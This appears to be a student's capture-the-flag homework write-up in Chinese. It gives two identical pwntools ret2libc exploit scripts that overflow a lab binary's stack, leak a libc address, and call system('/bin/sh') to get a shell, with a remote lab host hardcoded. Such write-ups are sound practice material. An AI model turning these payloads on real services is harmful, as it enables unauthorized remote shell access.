掘安作业二

思路:题目分为低级魔法和高级魔法两部分。经分析,在选项四处存在栈溢出漏洞,两道题目我都使用了ret2libc的方法,成功获得shell。

低级魔法脚本:

# -*- coding:utf-8 -*-

from pwn import *

from LibcSearcher import *

# Module-level setup for the "low-level magic" exploit script.
# Log every byte exchanged with the target; helpful when the recv/send sequence desyncs.
context.log_level = "debug"

# Parse the challenge binary once; pwn() reads its .plt / .got entries from here.
elf = ELF("pwn")

# Target selector read by __main__: 0 = connect to the remote instance, 1 = spawn ./pwn locally.
debugg = 1

# Rebound by pwn(): `sh` becomes the pwntools tube; `lib` is declared but never assigned.
sh, lib = 0., 0

def pwn(ip,port,debug):
       """Run the writeup's ret2libc chain against the "low-level magic" binary.

       Args:
           ip: host of the remote instance (only used when debug != 1).
           port: port of the remote instance.
           debug: 1 spawns ./pwn locally with process(); any other value connects with remote().

       Side effects: rebinds the module globals ``sh`` (the pwntools tube) and ``lib``
       (declared global here but never assigned), and ends in ``sh.interactive()``.

       Chain as the writeup describes it: (1) the stack overflow behind menu option 4
       is used to call puts(GOT[__libc_start_main]) and leak a libc address,
       (2) LibcSearcher resolves the libc build and the offsets of system and
       "/bin/sh", (3) the overflow is triggered again to call system("/bin/sh").
       The page does not state which protections the binary was built with; a stack
       canary or a PIE build would break stage (1), which relies on a fixed
       .plt/.got layout and on overwriting the saved return address.
       """

       global sh

       global lib



       if(debug == 1):

              sh = process("./pwn")

       else:

              sh = remote(ip,port)

              #lib = ELF("./libc6-i386_2.23-0ubuntu10_amd64.so")

       # Unused constant left by the author; its meaning is not stated in the writeup.
       #catFlag = 0x08048847

       # Filler bytes before the saved return address is overwritten (stack offset; not derived on the page).
       offset = 22

       # Drain whatever the program printed so far (presumably the menu), then pick option 4.
       sh.recv()

       sh.sendline("4")

       sh.recvuntil("You are one step short of success ")



       # Stage 1: return into puts@plt with GOT[__libc_start_main] as its argument, then
       # return to 0x0804862E (the writeup does not say what this address is; presumably
       # it re-enters the vulnerable handler so the overflow can be triggered a second time).
       # NOTE(review): the next line is indented with 4 spaces while the rest of the body
       # uses 7, so as pasted this is an IndentationError (copy/paste artifact of the post).
    payload1=offset*'a'+p32(elf.plt['puts'])+p32(0x0804862E)+p32(elf.got['__libc_start_main'])

       sh.send(payload1)# author's note: send should be changed to sendline

       # Leak: the 4 bytes puts prints are the runtime address of __libc_start_main.
       # Assumes exactly 4 bytes arrive in this single recv(); u32 raises on a short read.
       addr__libc_start_main=u32(sh.recv(4))



       # Identify the libc build from the leaked symbol address with LibcSearcher.
       obj = LibcSearcher("__libc_start_main", addr__libc_start_main)

       # libc load base = leaked runtime address - the symbol's offset inside that libc build.
       baseaddr_libc=addr__libc_start_main-obj.dump("__libc_start_main")

       addr_system=baseaddr_libc+obj.dump("system")# runtime address of system

       addr_binsh=baseaddr_libc+obj.dump("str_bin_sh")# runtime address of the "/bin/sh" string in libc

       #print addr_system

       #print addr_binsh

       #addr_read=baseaddr_libc+obj.dump("read")

       # Stage 2: re-enter option 4 and overflow again, now with resolved libc addresses.
       sh.sendline("4")

       sh.recv()

       # Alternative chain the author left commented out: read "/bin/sh\x00" (8 bytes) into
       # .bss with read() and then call system on it. Not used; the libc string is used instead.
       #addr_bss=0x0804a040

       #pppr=0x0804876d

#payload2=offset*"a"+p32(elf.plt['read'])+p32(pppr)+p32(0)+p32(addr_bss)+p32(8)+p32(addr_system)+p32(0x11111111)+p32(addr_bss) #"/bin/shx00" is 8 bytes in total

       # Final frame in the 32-bit layout: callee (system), its return address slot
       # (0x11111111 is filler, never returned to), then its single argument ("/bin/sh").
       payload2=offset*'a'+p32(addr_system)+p32(0x11111111)+p32(addr_binsh)

       sh.sendline(payload2) 

       #sh.send("/bin/shx00")

       # Hand the tube to the user; on success this is an interactive shell on the target.
       sh.interactive()

      

if __name__ == "__main__":
       # Remote instance named in the writeup; `debugg` decides whether it is actually used
       # (1 = local ./pwn instead).
       target_host, target_port = "101.132.100.243", 10011
       pwn(target_host, target_port, debugg)

高级魔法脚本:

# -*- coding:utf-8 -*-

from pwn import *

from LibcSearcher import *

# Module-level setup for the "high-level magic" exploit script (identical to the low-level one).
# Log every byte exchanged with the target; helpful when the recv/send sequence desyncs.
context.log_level = "debug"

# Parse the challenge binary once; pwn() reads its .plt / .got entries from here.
elf = ELF("pwn")

# Target selector read by __main__: 0 = connect to the remote instance, 1 = spawn ./pwn locally.
debugg = 1

# Rebound by pwn(): `sh` becomes the pwntools tube; `lib` is declared but never assigned.
sh, lib = 0., 0

def pwn(ip,port,debug):
       """Run the writeup's ret2libc chain against the "high-level magic" binary.

       This script is byte-for-byte the same as the one listed for the low-level
       challenge; the writeup states both binaries were solved the same way.

       Args:
           ip: host of the remote instance (only used when debug != 1).
           port: port of the remote instance.
           debug: 1 spawns ./pwn locally with process(); any other value connects with remote().

       Side effects: rebinds the module globals ``sh`` (the pwntools tube) and ``lib``
       (declared global here but never assigned), and ends in ``sh.interactive()``.

       Chain as the writeup describes it: (1) the stack overflow behind menu option 4
       is used to call puts(GOT[__libc_start_main]) and leak a libc address,
       (2) LibcSearcher resolves the libc build and the offsets of system and
       "/bin/sh", (3) the overflow is triggered again to call system("/bin/sh").
       The page does not state which protections the binary was built with; a stack
       canary or a PIE build would break stage (1), which relies on a fixed
       .plt/.got layout and on overwriting the saved return address.
       """

       global sh

       global lib



       if(debug == 1):

              sh = process("./pwn")

       else:

              sh = remote(ip,port)

              #lib = ELF("./libc6-i386_2.23-0ubuntu10_amd64.so")

       # Unused constant left by the author; its meaning is not stated in the writeup.
       #catFlag = 0x08048847

       # Filler bytes before the saved return address is overwritten (stack offset; not derived on the page).
       offset = 22

       # Drain whatever the program printed so far (presumably the menu), then pick option 4.
       sh.recv()

       sh.sendline("4")

       sh.recvuntil("You are one step short of success ")



       # Stage 1: return into puts@plt with GOT[__libc_start_main] as its argument, then
       # return to 0x0804862E (the writeup does not say what this address is; presumably
       # it re-enters the vulnerable handler so the overflow can be triggered a second time).
       # NOTE(review): the next line is indented with 4 spaces while the rest of the body
       # uses 7, so as pasted this is an IndentationError (copy/paste artifact of the post).
    payload1=offset*'a'+p32(elf.plt['puts'])+p32(0x0804862E)+p32(elf.got['__libc_start_main'])

       sh.send(payload1)# author's note: send should be changed to sendline

       # Leak: the 4 bytes puts prints are the runtime address of __libc_start_main.
       # Assumes exactly 4 bytes arrive in this single recv(); u32 raises on a short read.
       addr__libc_start_main=u32(sh.recv(4))



       # Identify the libc build from the leaked symbol address with LibcSearcher.
       obj = LibcSearcher("__libc_start_main", addr__libc_start_main)

       # libc load base = leaked runtime address - the symbol's offset inside that libc build.
       baseaddr_libc=addr__libc_start_main-obj.dump("__libc_start_main")

       addr_system=baseaddr_libc+obj.dump("system")# runtime address of system

       addr_binsh=baseaddr_libc+obj.dump("str_bin_sh")# runtime address of the "/bin/sh" string in libc

       #print addr_system

       #print addr_binsh

       #addr_read=baseaddr_libc+obj.dump("read")

       # Stage 2: re-enter option 4 and overflow again, now with resolved libc addresses.
       sh.sendline("4")

       sh.recv()

       # Alternative chain the author left commented out: read "/bin/sh\x00" (8 bytes) into
       # .bss with read() and then call system on it. Not used; the libc string is used instead.
       #addr_bss=0x0804a040

       #pppr=0x0804876d

#payload2=offset*"a"+p32(elf.plt['read'])+p32(pppr)+p32(0)+p32(addr_bss)+p32(8)+p32(addr_system)+p32(0x11111111)+p32(addr_bss) #"/bin/shx00" is 8 bytes in total

       # Final frame in the 32-bit layout: callee (system), its return address slot
       # (0x11111111 is filler, never returned to), then its single argument ("/bin/sh").
       payload2=offset*'a'+p32(addr_system)+p32(0x11111111)+p32(addr_binsh)

       sh.sendline(payload2) 

       #sh.send("/bin/shx00")

       # Hand the tube to the user; on success this is an interactive shell on the target.
       sh.interactive()

      

if __name__ == "__main__":
       # Remote instance named in the writeup; `debugg` decides whether it is actually used
       # (1 = local ./pwn instead).
       target_host, target_port = "101.132.100.243", 10011
       pwn(target_host, target_port, debugg)

原文地址:https://www.cnblogs.com/HYWZ36/p/11254938.html